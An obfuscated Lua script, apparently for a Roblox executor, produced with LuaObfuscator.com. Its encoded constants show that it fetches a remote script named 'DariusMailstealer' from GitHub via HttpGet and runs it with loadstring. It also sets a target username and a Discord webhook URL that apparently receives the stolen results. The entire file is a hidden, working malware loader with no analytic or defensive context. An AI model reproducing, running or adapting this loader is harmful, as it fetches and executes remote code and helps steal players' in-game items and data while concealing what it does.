--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.16) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then local v81=0;while true do if (v81==0) then v19=v0(v3(v30,1,1));return "";end end else local v82=v2(v0(v30,16));if v19 then local v89=v5(v82,v19);v19=nil;return v89;else return v82;end end end);local function v20(v31,v32,v33)if v33 then local v83=(v31/((2 + 0)^(v32-(2 -1))))%((5 -3)^(((v33-(1 -0)) -(v32-((2 -0) -1))) + (620 -(555 + 64)))) ;return v83-(v83%(932 -((2494 -(1523 + 114)) + 74))) ;else local v84=0;local v85;while true do if (v84==(568 -(367 + (1266 -(68 + 997))))) then v85=(929 -(214 + 713))^(v32-(1 + 0)) ;return (((v31%(v85 + v85))>=v85) and ((1271 -(226 + 1044)) + 0)) or (877 -(282 + 595)) ;end end end end local function v21()local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22()local v35,v36=v1(v16,v18,v18 + 2 );v18=v18 + (8 -6) ;return (v36 * (373 -(32 + 85))) + v35 ;end local function v23()local v37=0 + 0 ;local v38;local v39;local v40;local v41;while true do if (v37==(1 + 0)) then return (v41 * (16778173 -(655 + 237 + 65))) + (v40 * (156337 -90801)) + (v39 * (472 -216)) + v38 ;end if (v37==0) then v38,v39,v40,v41=v1(v16,v18,v18 + (4 -1) );v18=v18 + (354 -((213 -126) + 263)) ;v37=181 -(67 + 113) ;end end end local function v24()local v42=v23();local v43=v23();local v44=3 -(1 + 1) ;local v45=(v20(v43,1 + 0 ,79 -59 ) * ((7 -(890 -(261 + 624)))^(984 -(802 + 150)))) + v42 ;local v46=v20(v43,66 -45 ,83 -52 );local v47=((v20(v43,(101 -44) -25 )==(1 + 0)) and  -1) or (998 -(915 + 82)) ;if (v46==(0 -0)) then if (v45==(0 + 0)) then return v47 * ((1080 -(1020 + 60)) + 0) ;else local v90=772 -(201 + (1994 -(630 + 793))) ;while true do if (v90==(0 -0)) then v46=1188 -(1069 + 118) ;v44=0 + (0 -0) ;break;end end end elseif (v46==(7472 -5425)) then return ((v45==(0 -(0 -0))) and (v47 * ((1 -0)/(0 + 0)))) or (v47 * NaN) ;end return v8(v47,v46-(1817 -794) ) * (v44 + (v45/((2 + 0)^(843 -(368 + 423))))) ;end local function v25(v48)local v49=0;local v50;local v51;while true do if (v49==(0 + 0)) then v50=nil;if  not v48 then v48=v23();if (v48==(0 -0)) then return "";end end v49=1748 -(760 + (3871 -2884)) ;end if (v49==(1916 -(15 + 1774 + 124))) then return v6(v51);end if (v49==(768 -(745 + 17 + 4))) then v51={};for v91=1, #v50 do v51[v91]=v2(v1(v3(v50,v91,v91)));end v49=3;end if (v49==(1 + (1055 -(87 + 968)))) then v50=v3(v16,v18,(v18 + v48) -(2 -1) );v18=v18 + v48 ;v49=2;end end end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v52=1271 -(945 + 326) ;local v53;local v54;local v55;local v56;local v57;local v58;local v59;local v60;while true do if (v52==(4 -2)) then v57=nil;v58=nil;v52=3 + 0 ;end if ((700 -(271 + 429))==v52) then v53=0 + 0 ;v54=nil;v52=1;end if (v52==4) then while true do if (2==v53) then v58=nil;v59=nil;v53=3;end if (v53==(1503 -(1408 + 92))) then v60=nil;while true do local v99=1086 -(461 + 625) ;local v100;while true do if (v99==(1288 -(993 + 295))) then v100=0 + 0 ;while true do if (v100~=(1171 -(418 + 753))) then else local v141=0 + 0 ;while true do if (v141==1) then v100=1;break;end if (v141==(0 + 0)) then if (v54==(1 + 0)) then local v153=0 + 0 ;while true do if (v153~=(529 -(406 + 123))) then else local v163=0;while true do if (0==v163) then v58={v55,v56,nil,v57};v59=v23();v163=1;end if (v163~=(1 + 0)) then else v153=1146 -(466 + 679) ;break;end end end if (v153~=(2 -1)) then else v60={};v54=2;break;end end end if (v54==(8 -5)) then local v154=0;local v155;while true do if (v154~=(1900 -(106 + 1794))) then else v155=0 + 0 ;while true do if (v155==0) then local v173=0 + 0 ;while true do if ((0 -0)~=v173) then else for v175=1,v23() do v56[v175-(2 -1) ]=v28();end return v58;end end end end break;end end end v141=115 -(4 + 110) ;end end end if ((585 -(57 + 527))==v100) then if ((1427 -(41 + 1386))==v54) then local v151=103 -(17 + 86) ;while true do if ((0 + 0)==v151) then local v156=0 -0 ;while true do if (v156~=(2 -1)) then else v151=167 -(122 + 44) ;break;end if (0==v156) then v55={};v56={};v156=1;end end end if (v151==1) then v57={};v54=1;break;end end end if (v54~=(2 -0)) then else local v152=0;while true do if (v152==(3 -2)) then for v158=1 + 0 ,v23() do local v159=0;local v160;local v161;local v162;while true do if (v159==(0 + 0)) then local v165=0 -0 ;while true do if (v165==(66 -(30 + 35))) then v159=1 + 0 ;break;end if (v165~=0) then else v160=1257 -(1043 + 214) ;v161=nil;v165=1;end end end if (v159==1) then v162=nil;while true do if (v160==0) then local v174=0 -0 ;while true do if (v174==(1212 -(323 + 889))) then local v177=0;while true do if ((0 -0)==v177) then v161=580 -(361 + 219) ;v162=nil;v177=1;end if (v177==1) then v174=1;break;end end end if (v174==(321 -(53 + 267))) then v160=1 + 0 ;break;end end end if (v160~=1) then else while true do if (0~=v161) then else v162=v21();if (v20(v162,1,1)~=(413 -(15 + 398))) then else local v180=982 -(18 + 964) ;local v181;local v182;local v183;local v184;local v185;while true do if (v180~=1) then else v183=nil;v184=nil;v180=2;end if (v180==2) then v185=nil;while true do if (v181==(7 -5)) then while true do if (v182==2) then local v191=0 + 0 ;local v192;while true do if (v191==(0 + 0)) then v192=850 -(20 + 830) ;while true do if (v192~=(1 + 0)) then else v182=129 -(116 + 10) ;break;end if (v192==0) then if (v20(v184,1,1 + 0 )==1) then v185[2]=v60[v185[740 -(542 + 196) ]];end if (v20(v184,3 -1 ,1 + 1 )==1) then v185[3]=v60[v185[3]];end v192=1;end end break;end end end if (v182==1) then local v193=0 + 0 ;local v194;while true do if (v193~=(0 + 0)) then else v194=0;while true do if (v194==1) then v182=4 -2 ;break;end if (v194~=0) then else local v200=0;while true do if (v200==1) then v194=1;break;end if (v200~=(0 -0)) then else v185={v22(),v22(),nil,nil};if (v183==(1121 -(118 + 1003))) then local v206=0 -0 ;local v207;while true do if (v206==(377 -(142 + 235))) then v207=0 -0 ;while true do if (v207~=(0 + 0)) then else v185[3]=v22();v185[981 -(553 + 424) ]=v22();break;end end break;end end elseif (v183==(1 -0)) then v185[3]=v23();elseif (v183==2) then v185[3 + 0 ]=v23() -(2^16) ;elseif (v183~=(3 + 0)) then else local v212=0 + 0 ;local v213;local v214;while true do if (v212==(0 + 0)) then v213=0;v214=nil;v212=1;end if (v212==1) then while true do if (v213==0) then v214=0;while true do if (v214==0) then v185[2 + 1 ]=v23() -((4 -2)^16) ;v185[4]=v22();break;end end break;end end break;end end end v200=2 -1 ;end end end end break;end end end if (v182==0) then local v195=0;local v196;while true do if (v195==(0 -0)) then v196=0;while true do if (v196==(1 + 0)) then v182=1;break;end if (v196==(0 -0)) then local v201=0;while true do if (v201~=(753 -(239 + 514))) then else v183=v20(v162,1 + 1 ,3);v184=v20(v162,1333 -(797 + 532) ,5 + 1 );v201=1 + 0 ;end if (v201~=(2 -1)) then else v196=1203 -(373 + 829) ;break;end end end end break;end end end if (v182~=(734 -(476 + 255))) then else if (v20(v184,1133 -(369 + 761) ,2 + 1 )==1) then v185[4]=v60[v185[6 -2 ]];end v55[v158]=v185;break;end end break;end if (v181==1) then local v189=0 -0 ;while true do if (v189~=(238 -(64 + 174))) then else v184=nil;v185=nil;v189=1 + 0 ;end if (v189~=1) then else v181=2 -0 ;break;end end end if (v181~=(336 -(144 + 192))) then else local v190=216 -(42 + 174) ;while true do if (v190==(1 + 0)) then v181=1;break;end if (v190==(0 + 0)) then v182=0 + 0 ;v183=nil;v190=1;end end end end break;end if (0~=v180) then else v181=1504 -(363 + 1141) ;v182=nil;v180=1;end end end break;end end break;end end break;end end end v54=1583 -(1183 + 397) ;break;end if (0==v152) then local v157=0 -0 ;while true do if ((0 + 0)==v157) then for v166=1 + 0 ,v59 do local v167=1975 -(1913 + 62) ;local v168;local v169;local v170;local v171;local v172;while true do if (v167==0) then v168=0 + 0 ;v169=nil;v167=2 -1 ;end if (v167~=(1935 -(565 + 1368))) then else v172=nil;while true do if (v168==2) then while true do if (v169~=0) then else v170=0;v171=nil;v169=1;end if (v169==(3 -2)) then v172=nil;while true do if (v170~=0) then else local v186=0;local v187;while true do if (v186==0) then v187=1661 -(1477 + 184) ;while true do if (v187~=1) then else v170=1 -0 ;break;end if (v187~=(0 + 0)) then else v171=v21();v172=nil;v187=857 -(564 + 292) ;end end break;end end end if (v170==1) then if (v171==1) then v172=v21()~=(0 -0) ;elseif (v171==2) then v172=v24();elseif (v171==(8 -5)) then v172=v25();end v60[v166]=v172;break;end end break;end end break;end if (v168~=1) then else local v178=0;while true do if (v178==1) then v168=2;break;end if (v178==(304 -(244 + 60))) then v171=nil;v172=nil;v178=1 + 0 ;end end end if (v168==(476 -(41 + 435))) then local v179=0;while true do if (v179==1) then v168=1;break;end if (0~=v179) then else v169=1001 -(938 + 63) ;v170=nil;v179=1;end end end end break;end if (v167==(1 + 0)) then v170=nil;v171=nil;v167=2;end end end v58[1128 -(936 + 189) ]=v21();v157=1;end if (v157==(1 + 0)) then v152=1;break;end end end end end break;end end break;end end end break;end if (0==v53) then local v97=0;while true do if (0==v97) then v54=1613 -(1565 + 48) ;v55=nil;v97=1;end if ((1 + 0)==v97) then v53=1;break;end end end if (v53==(1139 -(782 + 356))) then local v98=0;while true do if (v98==(267 -(176 + 91))) then v56=nil;v57=nil;v98=2 -1 ;end if (v98~=(1 -0)) then else v53=2;break;end end end end break;end if (v52==(1095 -(975 + 117))) then v59=nil;v60=nil;v52=1879 -(157 + 1718) ;end if (1==v52) then v55=nil;v56=nil;v52=2 + 0 ;end end end local function v29(v61,v62,v63)local v64=v61[1];local v65=v61[2];local v66=v61[3];return function(...)local v67=v64;local v68=v65;local v69=v66;local v70=v27;local v71=1;local v72= -1;local v73={};local v74={...};local v75=v12("#",...) -1 ;local v76={};local v77={};for v86=0,v75 do if (v86>=v69) then v73[v86-v69 ]=v74[v86 + 1 ];else v77[v86]=v74[v86 + 1 ];end end local v78=(v75-v69) + 1 ;local v79;local v80;while true do v79=v67[v71];v80=v79[1];if (v80<=5) then if (v80<=2) then if (v80<=0) then do return;end elseif (v80==1) then if (v77[v79[2]]==v79[4]) then v71=v71 + 1 ;else v71=v79[3];end else v77[v79[2]]();end elseif (v80<=3) then local v101;local v102,v103;local v104;local v105;v63[v79[3]]=v77[v79[2]];v71=v71 + 1 ;v79=v67[v71];v77[v79[2]]=v63[v79[3]];v71=v71 + 1 ;v79=v67[v71];v77[v79[2]]=v63[v79[3]];v71=v71 + 1 ;v79=v67[v71];v105=v79[2];v104=v77[v79[3]];v77[v105 + 1 ]=v104;v77[v105]=v104[v79[4]];v71=v71 + 1 ;v79=v67[v71];v77[v79[2]]=v79[3];v71=v71 + 1 ;v79=v67[v71];v77[v79[2]]=v79[3]~=0 ;v71=v71 + 1 ;v79=v67[v71];v105=v79[2];v102,v103=v70(v77[v105](v13(v77,v105 + 1 ,v79[3])));v72=(v103 + v105) -1 ;v101=0;for v116=v105,v72 do v101=v101 + 1 ;v77[v116]=v102[v101];end v71=v71 + 1 ;v79=v67[v71];v105=v79[2];v77[v105]=v77[v105](v13(v77,v105 + 1 ,v72));v71=v71 + 1 ;v79=v67[v71];v77[v79[2]]();v71=v71 + 1 ;v79=v67[v71];v71=v79[3];elseif (v80>4) then local v119=0;local v120;local v121;local v122;local v123;while true do if (v119==2) then for v148=v120,v72 do v123=v123 + 1 ;v77[v148]=v121[v123];end break;end if (v119==1) then v72=(v122 + v120) -1 ;v123=0;v119=2;end if (v119==0) then v120=v79[2];v121,v122=v70(v77[v120](v13(v77,v120 + 1 ,v79[3])));v119=1;end end else v77[v79[2]]=v79[3];end elseif (v80<=8) then if (v80<=6) then v71=v79[3];elseif (v80>7) then v77[v79[2]]=v79[3]~=0 ;else v63[v79[3]]=v77[v79[2]];v71=v71 + 1 ;v79=v67[v71];v77[v79[2]]=v79[3];v71=v71 + 1 ;v79=v67[v71];v63[v79[3]]=v77[v79[2]];v71=v71 + 1 ;v79=v67[v71];v77[v79[2]]=v79[3];v71=v71 + 1 ;v79=v67[v71];v71=v79[3];end elseif (v80<=10) then if (v80>9) then v63[v79[3]]=v77[v79[2]];else v77[v79[2]]=v63[v79[3]];end elseif (v80>11) then local v135=0;local v136;local v137;while true do if (v135==0) then v136=v79[2];v137=v77[v79[3]];v135=1;end if (1==v135) then v77[v136 + 1 ]=v137;v77[v136]=v137[v79[4]];break;end end else local v138=v79[2];v77[v138]=v77[v138](v13(v77,v138 + 1 ,v72));end v71=v71 + 1 ;end end;end return v29(v28(),{},v17)(...);end v15("LOL!0B3O00028O00026O00F03F03093O00557365724E616D6532030B3O004269676D61736B6F743732030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403523O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F50726F636F6465723534392F446172697573536372697074732F6D61696E2F4461726975734D61696C737465616C657203083O00557365724E616D6503073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F2O3135313331323334352O34303733353336342F476C784971527748316178524C75676F506F4854624B7A70794E4A6D5452794A4C384B5F726D43596F76356F77525F44542D69747A38576A58334278414436452O6C4F6F00173O0012043O00013O0026013O000E000100020004063O000E0001001204000100043O001203000100033O00122O000100053O00122O000200063O00202O00020002000700122O000400086O000500016O000200056O00013O00024O00010001000100044O001600010026013O0001000100010004063O00010001001204000100043O001207000100093O00122O0001000B3O00122O0001000A3O00124O00023O00044O000100016O00017O00",v9(),...);
